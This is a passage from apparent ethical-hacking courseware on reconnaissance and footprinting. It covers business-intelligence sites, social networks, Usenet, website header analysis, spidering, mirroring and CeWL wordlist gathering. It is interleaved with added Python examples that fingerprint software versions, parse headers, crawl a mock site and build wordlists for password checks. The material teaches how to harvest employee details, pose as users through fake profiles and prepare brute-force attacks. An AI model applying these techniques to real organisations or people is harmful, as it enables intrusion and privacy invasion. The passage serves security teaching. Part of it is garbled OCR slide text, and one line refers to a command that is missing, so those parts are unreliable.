- Industry-specific blogs and publications
- Legal databases, e.g., LexisNexis
- Business information databases, e.g., Hoover's
- Online job postings
Competitive Intelligence - When Did this Company Begin? How Did it Develop?
Who leads it?
This information helps a company learn about the competitor's decision-makers.
Where is it located?
Competitive intelligence also includes the location of the company and information related to various branches and their operations.
Attackers can use the information gathered through competitive intelligence to build a hacking strategy.
Information Resource Sites
Information resource sites that help to gain competitive intelligence include:
EDGAR Database
Source: https://www.sec.gov/edgar.shtml
The Electronic Data Gathering, Analysis, and Retrieval system (EDGAR) performs automated collection, validation, indexing, acceptance, and forwarding of submissions by companies and others who are required by law to file with the U.S. Securities and Exchange Commission (SEC). Its primary purpose is to increase the efficiency and fairness of the securities market for the benefit of investors, corporations, and the economy by accelerating the receipt, acceptance, dissemination, and analysis of time-sensitive corporate information filed with the agency.
D&B Hoovers
Source: http://www.hoovers.com
D&B Hoovers leverages a commercial database of 120 million business records and analytics to deliver a sales intelligence solution that enables sales and marketing professionals to focus on the right prospects so that they can generate immediate growth for their business.
LexisNexis
Source: https://www.lexisnexis.com
LexisNexis provides content-enabled workflow solutions designed specifically for professionals in the legal, risk management, corporate, government, law enforcement, accounting, and academic markets. It maintains an electronic database of legal and public records. It enables customers to access documents and records from legal, news, and business sources. It is beneficial for companies and government agencies seeking data analytics supporting compliance, customer acquisition, fraud detection, health outcomes, identity solutions, investigation, receivables management, risk decisioning, and workflow optimization.
Business Wire
Source: https://www.businesswire.com
Business Wire focuses on press release distribution and regulatory disclosure. This company distributes full-text news releases, photos, and other multimedia content from various organizations across the globe to journalists, news media, financial markets, investors, information websites, databases, and general audiences. It has its own patented electronic network through which it releases news.
Factiva
Source: https://www.dowjones.com
Factiva is a global news database and licensed content provider. It is a business information and research tool that gets information from licensed and free sources and provides capabilities such as searching, alerting, dissemination, and business information management. Factiva products provide access to more than 33,000 sources such as licensed publications, influential websites, blogs, images, and videos. Its resources are made available from nearly every country worldwide in 28 languages, including more than 600 continuously updated newswires.
Competitive Intelligence - What Are the Company's Plans?
Information resource sites that help attackers gain a company's business plans include:
MarketWatch
Source: https://www.marketwatch.com
MarketWatch tracks the pulse of markets for engaged investors. The site is an innovator in business news, personal finance information, real-time commentary, and investment tools and data, with journalists generating headlines, stories, videos, and market briefs.
The Wall Street Transcript
Source: https://www.twst.com
The Wall Street Transcript is a website as well as a paid subscription-based publication that publishes industry reports. It expresses the views of money managers and equity analysts of different industry sectors. The site also publishes interviews with CEOs of companies.
Alexa
Source: https://www.alexa.com
Alexa is a great tool to dig deep into the analytics of other companies. It allows users to discover influencer outreach opportunities by uncovering sites that link to their competitors using Competitor Backlink Checker, and to benchmark and track their company's performance relative to their competitors using Competitive Intelligence Tools. (The alexa.com web analytics service was retired in May 2022.)
Euromonitor
Source: https://www.euromonitor.com
Euromonitor provides strategy research capabilities for consumer markets. It publishes reports on industries, consumers, and demographics. It provides market research and surveys focused on the organization's needs.
Experian
Source: https://www.experian.com
Experian provides insights into competitors' search, display, affiliate, and social marketing strategies and metrics to improve marketing campaign results. It allows the user to:
- Benchmark the effectiveness of customer acquisition
- Determine what is driving competitors' existing success strategies
- Reach, monthly click rates and CPCs, market share, trademark use, ad spending, and affiliate activity
USPTO
Source: https://www.uspto.gov
The United States Patent and Trademark Office (USPTO) provides information related to patent and trademark registration. It provides general information concerning patents and search options for patents and trademark databases.
Competitive Intelligence - What Expert Opinions Say About the Company?
Information resource sites that help the attacker to obtain expert opinions about the target company include:
SEMRush
Source: https://www.semrush.com
SEMRush is a competitive keyword research tool. It can provide a list of Google keywords and AdWords for any site, as well as a competitor list in the organic and paid Google search results. It enables an approach for gaining in-depth knowledge about what competitors are advertising and their budget allocation to specific Internet marketing tactics.
AttentionMeter
Source: http://www.attentionmeter.com
AttentionMeter is a tool for comparing websites (traffic) by using Alexa, Compete, and Technorati. It gives a snapshot of traffic data as well as graphs from Alexa, Compete, and Technorati for the specified websites.
ABI/INFORM Global
Source: https://www.proquest.com
ABI/INFORM Global is a business database. ABI/INFORM Global offers the latest business and financial information for researchers. With ABI/INFORM Global, users can determine business conditions, management theory and practice, techniques and tactics, corporate strategy, business trends, and the competitive landscape.
SimilarWeb
Source: https://www.similarweb.com
SimilarWeb aggregates data from multiple sources to estimate traffic, geography, and referral data for a company's websites and mobile apps. It also provides a panel through a browser extension that allows refining other data sources by anonymously tracking browser activity across millions of browsers worldwide.
Other Techniques for Footprinting through Web Services
Information Gathering Using Business Profile Sites
Finding useful information from corporate websites is a necessary step in the information gathering phase. These business profile sites contain business information of companies located in a particular region with their contact information, which can be viewed by anyone.
Attackers use business profile sites such as opencorporates, Crunchbase, and corporationwiki to gather important information about the target organizations, such as their addresses, contact information (such as location, phone numbers, and email addresses), employee database, department names, type of service provided, and type of industry.
Figure 2.33: Screenshot of opencorporates search showing results for Microsoft
Monitoring Targets Using Alerts
Alerts are content monitoring services that provide automated, up-to-date information based on user preference, usually via email or SMS. To receive alerts, a user must register either an email address or a phone number. Online alert services automatically notify users when new content from news, blogs, and discussion groups matches a set of search terms selected by the user. These services provide up-to-date information about competitors and the industry. Alerts are sent via email or SMS notifications.
Tools such as Google Alerts, Twitter Alerts, and Giga Alerts help attackers to track mentions of the organization's name, member names, website, or any people or projects that are important. Attackers can gather updated information about the target periodically from the alert services and use it for further attacks.
Google Alerts
Source: https://www.google.com/alerts
Google Alerts automatically notifies users when new content from news, websites, blogs, videos, and/or discussion groups matches a set of search terms selected by the user and stored by the Google Alerts service.
Figure 2.34: Screenshot of Google Alert
Figure 2.35: Screenshot of Google Alert Preview
Tracking Online Reputation of the Target
Online Reputation Management (ORM) is a process of monitoring what is displayed when someone searches for your company's reputation on the Internet. ORM then takes measures to minimize negative search results or reviews. The process helps to improve brand reputation.
Companies often track the public feedback given to them using ORM tracking tools and then take measures to improve their credibility and retain their customers' trust. For positive online reputation management, organizations will often try to be more transparent over the Internet. This transparency may help the attacker to collect genuine information about the target organization.
Online Reputation Tracking Tools
Online reputation tracking tools help us to discover what people are saying online about the company's brand in real time across the web, social media, and news. They help in monitoring, measuring, and managing one's reputation online.
An attacker may use ORM tracking tools to:
- Track a company's online reputation
- Collect a company's search engine ranking information
- Obtain email notifications when a company is mentioned online
- Track conversations
- Obtain social news about the target organization
Mention
Source: https://mention.com
Mention is an online reputation tracking tool that helps attackers in monitoring the web, social media, forums, and blogs to learn more about the target brand and industry. As shown in the screenshot, this tool helps attackers in tracking online conversations as they happen, wherever they happen. Using Mention, attackers can have live, up-to-date reports delivered to any email address in real time.
Figure 2.36: Screenshot of Mention
Information Gathering Using Groups, Forums, and Blogs
Many Internet users use blogs, groups, and forums for knowledge sharing purposes. For this reason, attackers often focus on groups, forums, and blogs to find information about a target organization and its people. Organizations generally fail to monitor the exchange of information that employees reveal to other users in forums, blogs, and group discussions. Attackers see this as an advantage and collect sensitive information about the target, such as public network information, system information, and employee personal information. Attackers can register with fake profiles in Google groups, Yahoo groups, and so on. They try to join the target organization's groups, where they can obtain personal employee and company information. Attackers can also search for information in groups, forums, and blogs by Fully Qualified Domain Names (FQDNs) and IP addresses.
Employee information that an attacker can gather from groups, forums, and blogs may include:
- Full name of the employee
- Place of work and residence
- Home telephone, cell number, or office number
- Personal and organizational email address
- Pictures of the employee residence or work location that include identifiable information
- Pictures of employee awards and rewards or upcoming goals
Figure 2.37: Screenshot of Google Groups
Information Gathering Using NNTP Usenet Newsgroups
A Usenet newsgroup is a repository containing a collection of notes or messages on various subjects and topics that are submitted by the users over the Internet. Network News Transfer Protocol (NNTP) is used to relay Usenet news articles from the discussions over the newsgroup. Usenet newsgroups can be a useful source of valuable information about the target. People seek help by posting and asking questions on Usenet newsgroups. Many professionals use the newsgroups to resolve their technical issues by posting questions on Usenet. To obtain solutions for these issues, sometimes they post more detailed information about the target than needed. Attackers can search Usenet newsgroups and mailing lists, through Usenet providers such as Newshosting, Eweka, and Supernews, to find valuable information about the operating systems, software, web servers, etc., used by the target organization.
For example, from the screenshot given below, you can understand that the target organization is using a Red Hat Linux 6.2 machine that is running Apache web server 1.3.23. This information helps attackers in performing web server and web application attacks.
Figure 2.38: Screenshot of sample USENET newsgroup posting
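The following Python example is added here as an illustration and is not part of the original courseware; it serves both the job-site footprinting discussed earlier (requirements lists that name firewalls, server operating systems, databases and virtualization platforms) and the Usenet posting above (a Red Hat Linux 6.2 host running Apache 1.3.23). It extracts product/version pairs from free text with a small table of regular expressions, groups them by technology category, and then flags versions below a reference floor, which is how the technical detail in a posting becomes a list of things worth checking for known vulnerabilities. The job posting, the Usenet post and the version floors in MIN_VERSIONS are all constructed sample data, not an authoritative vulnerability reference.

```python
import re
from collections import defaultdict

# Constructed sample texts (not real postings).
JOB_POSTING = """Network Administrator (constructed sample posting)
Responsibilities: maintain Cisco ASA 5525 firewalls, Windows Server 2016 domain controllers,
Red Hat Enterprise Linux 7 application hosts and an Oracle Database 12c cluster.
Experience with VMware vSphere 6.7 and Apache Tomcat 8.5 required."""

USENET_POST = """Subject: web server segfault after upgrade (constructed sample post)
We are running Red Hat Linux 6.2 with Apache 1.3.23 and mod_ssl 2.8.7 on our public
web server and it dies under load. Sendmail 8.11.6 on the same box is fine. Any ideas?"""

# Category -> regex with two groups: product name and (possibly empty) version.
TECH_PATTERNS = {
    "firewall": re.compile(r"\b(Cisco ASA|Check ?Point|Palo Alto|FortiGate|pfSense)\s*([\w.-]*)", re.I),
    "os": re.compile(r"\b(Windows Server|Red Hat(?: Enterprise)? Linux|Ubuntu|CentOS|Debian|Solaris)\s*([\d.]*)", re.I),
    "web_server": re.compile(r"\b(Apache Tomcat|Apache|nginx|IIS|lighttpd)\s*/?\s*([\d.]*)", re.I),
    "database": re.compile(r"\b(Oracle Database|MySQL|PostgreSQL|SQL Server|MongoDB)\s*([\w.]*)", re.I),
    "virtualization": re.compile(r"\b(VMware vSphere|ESXi|Hyper-V|KVM)\s*([\d.]*)", re.I),
    "mail": re.compile(r"\b(Sendmail|Postfix|Exim|Exchange)\s*([\d.]*)", re.I),
}

# Constructed reference floors: anything older than these is flagged for a closer look.
MIN_VERSIONS = {
    "Apache": (2, 4),
    "Red Hat Linux": (9, 0),
    "Windows Server": (2016,),
    "Sendmail": (8, 15),
}


def extract_technologies(text):
    """Return {category: sorted [(product, version_or_None), ...]} found in the text."""
    found = defaultdict(set)
    for category, pattern in TECH_PATTERNS.items():
        for product, version in pattern.findall(text):
            product = re.sub(r"\s+", " ", product)          # collapse odd spacing
            found[category].add((product, version.strip(".") or None))  # drop sentence-ending dot
    return {cat: sorted(items, key=lambda t: (t[0], t[1] or "")) for cat, items in found.items()}


def parse_version(version):
    """'1.3.23' -> (1, 3, 23); non-numeric parts such as the 'c' in '12c' are ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", version or ""))


def flag_old_versions(found, minimums):
    """List 'Product version' strings whose version is below the reference floor."""
    flagged = []
    for items in found.values():
        for product, version in items:
            floor = minimums.get(product)
            if floor and version and parse_version(version) < floor:
                flagged.append(f"{product} {version}")
    return sorted(flagged)


if __name__ == "__main__":
    for label, text in (("job posting", JOB_POSTING), ("usenet post", USENET_POST)):
        techs = extract_technologies(text)
        print(label, techs)
        print("  flagged:", flag_old_versions(techs, MIN_VERSIONS))
```

The regex table is deliberately small and easy to extend; in practice the product list grows with each engagement, and a version with no entry in the reference table is reported but never flagged, so the output is a lead list rather than a finding.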
Footprinting through Social Networking Sites
While footprinting through social networking sites may seem similar to footprinting through social engineering (which is discussed in greater detail later), there are some differences between the two methods. In footprinting through social engineering, the attacker tricks people into revealing information, whereas in footprinting through social networking sites, the attacker gathers information available on those sites. Attackers can even use social networking sites as a medium to perform social engineering attacks. This section explains social engineering on social networking sites and the type of information one can collect from social networking sites using it. It aims to familiarize you with locating information from social media sites using various online services and resources.
Collecting Information through Social Engineering on Social Networking Sites
Social networking sites are online services, platforms, or other sites that allow people to connect and to build interpersonal relations. The use of social networking sites is increasing rapidly. Examples of such sites include LinkedIn, Facebook, Instagram, Pinterest, Twitter, YouTube, and so on. Each social networking site has its own purpose and features. One site may connect friends, family, and so on, while another helps users to share professional profiles. Social networking sites are open to everyone. Attackers may take advantage of this feature to gather sensitive information from users either by browsing through users' public profiles or by creating a fake profile to pose as a genuine user. On social networking sites, people may post personal information such as date of birth, educational information, employment background, spouse's names, and so on. Organizations often post information such as potential partners, websites, and upcoming news about the company.
For an attacker, social networking sites can be valuable sources of information about the target person or organization. There are no barriers for attackers to access the public pages of accounts created on social networking sites. The attacker can only gather information that is posted by the individuals. To obtain more information about the target, attackers may create fake accounts and use social engineering techniques to lure the victim into revealing more information. For example, the attacker can send a friend request to the target person from a fake account; if the victim accepts the request, then the attacker can access even the restricted pages of the target person on that website.
What Users Do              | What Attacker Gets
Maintain profile           | Contact info, location, and related information
Connect to friends, chat   | Friends list, friends' info, and related information
Share photos and videos    | Identity of family members, interests, and related information
Play games, join groups    | Interests
Create events              | Activities
Table 2.5: Activities of users on the social networking sites and the respective information
Like individuals, organizations also use social networking sites to connect with people, promote their products, and gather feedback about their products and services. The activities of an organization on social networking sites and the respective information that an attacker can collect are summarized in the table below.
What Organizations Do               | What Attacker Gets
User surveys                        | Business strategies
Promote products                    | Product profile
User support                        | Social engineering
Recruitment                         | Platform/technology information
Background check to hire employees  | Type of business
Table 2.6: Activities of the organization on the social networking sites and the respective information
GeneralResourcesfor Locating
Informationfrom Social
Media Sites
|G Atacerstracksocial
media
sites using
to dscover
most shared
contentUsing
hashags track
or keywords,
accounts
‘tacks ue thsinformation
to parton
soil
phishing, andother
engineering,
search f indsthemort
engine
Shared
contentor tpl,
GeneralResourcesfor Locating
Informationfrom SocialMedia Sites
Severalonlineservices andresources are availableto
fromone or more socialmediasites.These gather
valuable informationabouta target
services allowattackers
content across socialmediasites byusinghashtags or keywords,
to discovermost shared
track accounts andURLson
mediasites,obtaina target’s
various social emailaddress, etc.Thisinformationhelpsattackers
to performphishing, socialengineering,andather typesof attacks.
Attackers use tools such as BuzzSumo, Google Trends, Hashatit, and Ubersuggest to locate information on social media sites:
= BuzzSumo
Source: https://buzzsumo.com
BuzzSumo's advanced social search engine finds the most shared content for a topic, author, or domain. It shows the shared activity across all the major social networks including Facebook, Twitter, LinkedIn, Google Plus, and Pinterest. As shown in the screenshot, attackers use BuzzSumo to track the most shared content related to the target domain and obtain details such as social media account information, URLs, and email addresses.
Figure 2.39: Screenshot of BuzzSumo showing the shared content
Conducting Location Search on Social Media Sites
Tools for Footprinting through Social Networking Sites
Attackers use this command to search for a target user on social media platforms.
Figure 2.41: Screenshot showing the result of Sherlock tool
= Social Searcher
Source: https://www.social-searcher.com
Social Searcher allows attackers to search for content in social networks in real time and provides deep analytics data. Attackers use this tool to track a target user on various social networking sites and obtain information such as complete URLs to their profiles, their postings, and other personal information.
Figure 2.42: Screenshot of Social Searcher showing user content on social networks
Website Footprinting
So far, we have discussed footprinting through search engines, web services, and social networking sites. Hereafter, we will discuss website footprinting. An organization's website is the first place to get sensitive information such as names and contact details of the leaders of the organization, upcoming project details, and so on.
This section covers the website footprinting concept, mirroring websites, extracting website information and links, gathering wordlists, extracting metadata of public documents, and monitoring web updates and website traffic.
Website footprinting refers to monitoring and analyzing a target organization's website for information. An attacker can build a detailed map of a website's structure and architecture without triggering the IDS or arousing the suspicion of any system administrator. Attackers use sophisticated footprinting tools or the basic tools that come with the operating system, such as Telnet or a browser.
The Netcraft tool can gather website information such as IP address, registered name and address of the domain owner, domain name, host of the site, and OS details. However, the tool may not give all these details for every site. In such cases, the attacker can browse the target website. Browsing the target website will typically provide the following information:
= Software used and its version: An attacker can easily find the software and version in use on an off-the-shelf software-based website.
= Operating system used: Usually, the operating system in use can also be determined.
= Sub-directories and parameters: Searches can reveal the sub-directories and parameters by making a note of the URLs while browsing the target website.
= Filename, path, database field name, or query: The attacker will often carefully analyze anything after a query that looks like a filename, path, database field name, or query to check whether it offers opportunities for SQL injection.
= Scripting platform: With the help of script filename extensions such as .php, .asp, or .jsp, one can easily determine the scripting platform that the target website is using.
= Technologies used: By inspecting the URLs of the target website, one can easily determine the technologies (.NET, J2EE, PHP, etc.) used to build that website.
= Contact details and CMS details: The contact pages usually offer details such as names, phone numbers, email addresses, and locations of admin or support personnel. An attacker can use these details to perform a social engineering attack. CMS software allows URL rewriting to disguise script filename extensions; the scripting platform can still be identified if the attacker is willing to devote additional effort toward determining it.
Attackers use Burp Suite, Zaproxy, WhatWeb, BuiltWith, Wappalyzer, and Website Informer to view headers that provide:
= Connection status and content type
= Accept-Ranges and Last-Modified information
= X-Powered-By information
= Web server in use and its version
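The header analysis described above can be reproduced without any of the named tools. The following Python script is an added example written for this section; it is not EC-Council's code nor part of Burp Suite, WhatWeb, or any other product mentioned here. The HTTP response it parses is constructed inline, and the hardening function only mimics the effect that Apache's ServerTokens Prod directive and PHP's expose_php = Off setting have on the Server and X-Powered-By headers.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample response (not captured from any real site): the headers a
# browser's developer tools or an intercepting proxy would show for an
# off-the-shelf LAMP-style site.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 06 Jul 2020 10:15:00 GMT\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "Last-Modified: Fri, 03 Jul 2020 08:00:00 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

# Headers whose value names the server software, scripting platform or framework.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
# Default session-cookie names that identify the platform even when headers are quiet.
PLATFORM_COOKIES = re.compile(r"\s*(PHPSESSID|JSESSIONID|ASP\.NET_SessionId|CFID)=")


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response into a lower-cased {name: value} dict."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # [0] is the status line
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint(headers: Dict[str, str]) -> List[Tuple[str, str, bool]]:
    """Return (header, value, carries_version) for every platform tell found."""
    findings = []
    for name in DISCLOSURE_HEADERS:
        if name in headers:
            value = headers[name]
            findings.append((name, value, bool(re.search(r"\d+\.\d+", value))))
    m = PLATFORM_COOKIES.match(headers.get("set-cookie", ""))
    if m:
        findings.append(("set-cookie", m.group(1), False))
    return findings


def hardened(headers: Dict[str, str]) -> Dict[str, str]:
    """Defender view of the same response with version strings removed. On Apache,
    'ServerTokens Prod' reduces Server to the product name and PHP's
    'expose_php = Off' suppresses X-Powered-By; this function mimics that."""
    out = dict(headers)
    out.pop("x-powered-by", None)
    if "server" in out:
        out["server"] = out["server"].split("/")[0]
    return out


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_RESPONSE)
    for name, value, versioned in fingerprint(hdrs):
        print(f"{name}: {value}" + ("  <-- version disclosed" if versioned else ""))
    print("after hardening:", fingerprint(hardened(hdrs)))
```

Note that the session cookie name still identifies the platform after the headers are cleaned, which is why renaming the default session cookie belongs to the same hardening step.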
= Burp Suite
Source: https://portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities. Burp Proxy allows attackers to intercept all requests and responses between the browser and the target web application and obtain information such as the web server used, its version, and web-application-related vulnerabilities.
Figure 2.43: Screenshot of Burp Suite
Website footprinting can be performed by examining HTML source code and cookies.
= Examining the HTML source code
Attackers can gather sensitive information by examining the HTML source code and following the comments that are inserted manually or those that the CMS system creates. The comments may provide clues as to what is running in the background. They may even provide the contact details of the web developer or administrator. Observe all the links and image tags to map the file structure of the system.
= Examining Cookies
Figure 2.44: Screenshot showing HTML source code
Figure 2.45: Screenshot showing cookies
Website Footprinting using Web Spiders
A web spider (also known as a web crawler or web robot) is a program or automated script that browses websites in a methodical manner to collect specific information such as employee names and email addresses. Attackers then use the collected information to perform footprinting and social engineering attacks. Web spidering fails if the target website has the robots.txt file in its root directory with a listing of directories to prevent crawling.
Attackers can uncover all the files and web pages on the target website by simply feeding the web spider with a URL. Then, the web spider sends hundreds of requests to the target website and analyzes the HTML code of all the received responses for identifying additional links. If any new links are found, then the spider adds them to the target list and starts spidering and analyzing the newly discovered links. This method helps attackers to not only detect exploitable web-attack surfaces but also to find all the directories, web pages, and files that make up the target website.
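The spidering loop just described (queue of URLs, HTML parsed for new links, newly found links added to the queue) and the earlier point about HTML comments, image tags, and email addresses in the source can both be seen in one small crawler. The following Python script is an added example for this section, not EC-Council's code nor any spidering product's; it crawls a constructed in-memory site instead of a live host, and the site, its robots.txt, and the hostname corp.example are all made up. One caveat for defenders: robots.txt is honoured only by crawlers that choose to honour it, which the honor_robots switch makes visible, so it is a courtesy signal rather than an access control.

```python
import re
from collections import deque
from html.parser import HTMLParser
from urllib import robotparser
from urllib.parse import urljoin, urlparse

# Constructed in-memory site (no network): path -> HTML body. Hostnames and
# addresses are fictitious.
BASE = "http://corp.example"
SITE = {
    "/": """<html><!-- Deployed with ExampleCMS 3.1 -->
            <a href="/about">About</a> <a href="/staff/">Staff</a>
            <a href="/private/">Private</a> <a href="http://other.example.org/">Partner</a>
            <img src="/img/logo.png"></html>""",
    "/about": """<!-- TODO: remove test account admin@corp.example before launch -->
                 <a href="/">Home</a> <a href="/about#team">Team</a>""",
    "/staff/": """Contact: jane.doe@corp.example <img src="/uploads/2020/team.jpg">""",
    "/private/": "internal listing",
}
ROBOTS = ["User-agent: *", "Disallow: /private/"]
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


class PageParser(HTMLParser):
    """Collect links, image sources and comments from one HTML document."""

    def __init__(self):
        super().__init__()
        self.links, self.images, self.comments = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "img" and a.get("src"):
            self.images.append(a["src"])

    def handle_comment(self, data):
        self.comments.append(data.strip())


def spider(site, base, robots_lines, honor_robots=True):
    """Breadth-first crawl of `site`; returns what a footprinter would map."""
    rp = robotparser.RobotFileParser()
    rp.parse(robots_lines)
    host = urlparse(base).netloc
    queue, seen = deque(["/"]), set()
    result = {"pages": [], "images": set(), "comments": [], "emails": set(),
              "external": set(), "skipped": []}
    while queue:
        path = queue.popleft()
        if path in seen:
            continue
        seen.add(path)
        if honor_robots and not rp.can_fetch("*", base + path):
            result["skipped"].append(path)          # disallowed, so not fetched
            continue
        body = site.get(path)
        if body is None:                             # behaves like a 404
            continue
        result["pages"].append(path)
        parser = PageParser()
        parser.feed(body)
        result["comments"] += parser.comments
        result["emails"] |= set(EMAIL_RE.findall(body))   # comments included
        for href in parser.links:
            target = urlparse(urljoin(base, href))
            if target.netloc != host:
                result["external"].add(target.geturl())
                continue
            queue.append(target.path or "/")         # fragment dropped: /about#team == /about
        for src in parser.images:
            result["images"].add(urlparse(urljoin(base, src)).path)
    return result


if __name__ == "__main__":
    found = spider(SITE, BASE, ROBOTS)
    print("pages:", found["pages"], "skipped by robots.txt:", found["skipped"])
    print("comments:", found["comments"])
    print("emails:", sorted(found["emails"]), "images:", sorted(found["images"]))
```

The comments list is the same material a reviewer should remove before deployment: a CMS version string and a leftover test account are exactly what the page says an attacker looks for in the source.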
User-Directed Spidering
Attackers, in some cases, use a more sophisticated technique for spidering the target website instead of using automated tools. They use standard web browsers to walk through the target website in an attempt to navigate through all the functionalities provided by the web application. While performing this task, the resulting incoming and outgoing traffic of the website is monitored and analyzed by tools that include features of both a web spider and an intercepting proxy. Further, these tools create a map of the web application consisting of all the URLs visited by the browser. The tool also analyzes the responses of the application and updates the map with the discovered content and its functionalities. Attackers use tools such as Burp Suite and WebScarab to perform user-directed spidering.
Web spidering tools such as Web Data Extractor, ParseHub, and SpiderFoot can collect sensitive information from the target website.
= Web Data Extractor
Source: http://www.webextractor.com
Web Data Extractor automatically extracts specific information from web pages. It extracts targeted contact data (email, phone, and fax) from the website, extracts the URL and meta tags (title, description, keyword) for website promotion, searches directory creation, performs web research, and so on. As shown in the screenshot, attackers use Web Data Extractor to automatically gather critical information such as lists of meta tags, e-mail addresses, and phone and fax numbers from the target website.
Figure 2.46: Screenshot of Web Data Extractor
Mirroring Entire Website
Website mirroring is the process of creating a replica or clone of the original website using mirroring tools such as HTTrack Web Site Copier and NCollector Studio. These tools download a website to a local directory and recursively build all the directories of the website. Mirroring a website offers the following advantages:
= It is helpful for offline site browsing
= It enables an attacker to spend more time in viewing and analyzing the website for vulnerabilities and loopholes
= It helps in finding the directory structure and other valuable information from the mirrored copy without multiple requests to the web server
Attackers can use this information to perform various web application attacks on the target organization's website.
= Website Mirroring Tool: HTTrack Web Site Copier
Source: http://www.httrack.com
HTTrack is an offline browser utility. It downloads a website from the Internet to a local directory and recursively builds all the directories, including HTML, images, and other files, from the web server on another computer. As shown in the screenshot, attackers use HTTrack to mirror the entire website of the target organization, store it in the local system drive, and browse the local website to identify possible exploits and vulnerabilities.
Figure 2.47: Screenshot of HTTrack Web Site Copier mirroring the target website
Extracting Website Information from https://archive.org
Internet Archive's Wayback Machine allows one to visit archived versions of websites.
Figure 2.48: Screenshot of Archive showing archived versions of microsoft.com
Figure 2.49: Screenshot of Archive showing archived web pages of microsoft.com
Extracting Website Links
Tools such as Netpeak Spider, Octoparse, and Link Extractor are used to extract website links.
Extracting website links is an important part of website footprinting, where an attacker analyzes a target website to determine its internal and external links. Using the gathered information, an attacker can find out the applications, web technologies, and other related websites that are linked to the target website. Further, dumping the obtained links can reveal important connections and helps attackers to identify and extract the URLs of resources such as CSS and JavaScript files. This information helps attackers to identify vulnerabilities in the target website and find ways to exploit the web application.
= Octoparse
Source: https://www.octoparse.com
Octoparse offers automatic data extraction, as it quickly scrapes web data without coding and turns web pages into structured data. As shown in the screenshot, attackers use Octoparse to capture information from web pages, such as text, links, image URLs, or HTML code.
Figure 2.50: Screenshot of Octoparse
Figure 2.51: Screenshot showing output of Octoparse
Gathering Wordlist from the Target Website
The words available on the target website may reveal critical information that helps attackers to perform further exploitation. Attackers gather a list of email addresses related to the target organization using various search engines, social networking sites, web spidering tools, etc. After obtaining these email addresses, an attacker can gather a list of words available on the target website. This information helps the attacker to perform brute-force attacks on the target organization. An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.
= CeWL
To run the tool, issue the following commands:
ruby cewl.rb --help
This command displays various options that a user can use to obtain a list of words from the target website.
cewl www.certifiedhacker.com
This command returns a list of unique words present in the target URL.
cewl --email www.certifiedhacker.com
In this case, the target website is www.certifiedhacker.com, and the '--email' option is used to fetch a list of words and email addresses from the target website.
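What CeWL does with a page can be shown in a few lines: strip the markup, keep the words above a minimum length, count them, and pull out email addresses. The Python script below is an added example for this section and is neither CeWL's code nor EC-Council's; the HTML it processes is constructed inline rather than fetched, and the defender-side check at the end (does a candidate password contain a word taken from the organization's own site?) is the reason an organization should build the same list about itself.

```python
import re
from collections import Counter
from typing import List, Set, Tuple

# Constructed page body (not fetched from any site) standing in for what a
# spider would collect from the target.
SAMPLE_HTML = """<html><head><title>Certified Hacker Portal</title>
<style>body { margin: 0 }</style></head>
<body><h1>Welcome to the Corporate Portal</h1>
<p>The portal is maintained by the Infrastructure team.
Contact jane.doe@certifiedhacker.com or support@certifiedhacker.com.</p>
<script>var apiKey = "internal-token";</script>
<!-- Portal release 2020 -->
</body></html>"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def visible_text(html: str) -> str:
    """Drop script/style bodies, comments and tags; keep the text a visitor reads."""
    text = re.sub(r"<(script|style)[^>]*>.*?</\1>", " ", html, flags=re.S | re.I)
    text = re.sub(r"<!--.*?-->", " ", text, flags=re.S)
    return re.sub(r"<[^>]+>", " ", text)


def build_wordlist(html: str, min_length: int = 5,
                   lowercase: bool = True) -> List[Tuple[str, int]]:
    """Words of at least min_length letters, most frequent first."""
    words = re.findall(r"[A-Za-z]{%d,}" % min_length, visible_text(html))
    if lowercase:
        words = [w.lower() for w in words]
    return Counter(words).most_common()


def extract_emails(html: str) -> Set[str]:
    """Addresses anywhere in the source, comments included (the --email idea)."""
    return set(EMAIL_RE.findall(html))


def is_site_derived(password: str, wordlist: List[Tuple[str, int]]) -> bool:
    """Defender check: would this password fall to a list built from the site?"""
    pw = password.lower()
    return any(word in pw for word, _count in wordlist)


if __name__ == "__main__":
    wl = build_wordlist(SAMPLE_HTML)
    print("words:", wl)
    print("emails:", sorted(extract_emails(SAMPLE_HTML)))
    print("Portal2020! site-derived?", is_site_derived("Portal2020!", wl))
```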
Figure 2.52: Screenshot showing results obtained from CeWL tool
Extracting Metadata of Public Documents
Useful information may reside on the target organization's website in the form of pdf documents, Microsoft Word files, and other files in various formats. Attackers extract valuable data, including metadata and hidden information, from such documents. The data mainly contains hidden information about the public documents that can be analyzed to extract information such as the title of the page, description, keywords, creation/modification date and time of the content, and usernames and e-mail addresses of employees of the target organization. An attacker can misuse this information to perform malicious activities against the target organization by brute-forcing authentication using the usernames and e-mail addresses of employees, or perform social engineering to send malware, which can infect the target system.
Metadata Extraction Tools
Metadata extraction tools such as Metagoofil, Exiftool, and Web Data Extractor automatically extract critical information that includes the usernames of clients, operating systems (exploits are OS-specific), email addresses (possibly for social engineering), list of software (version and type) used, list of servers, document date creation/modification, and authors of the website.
= Metagoofil
Source: https://code.google.com
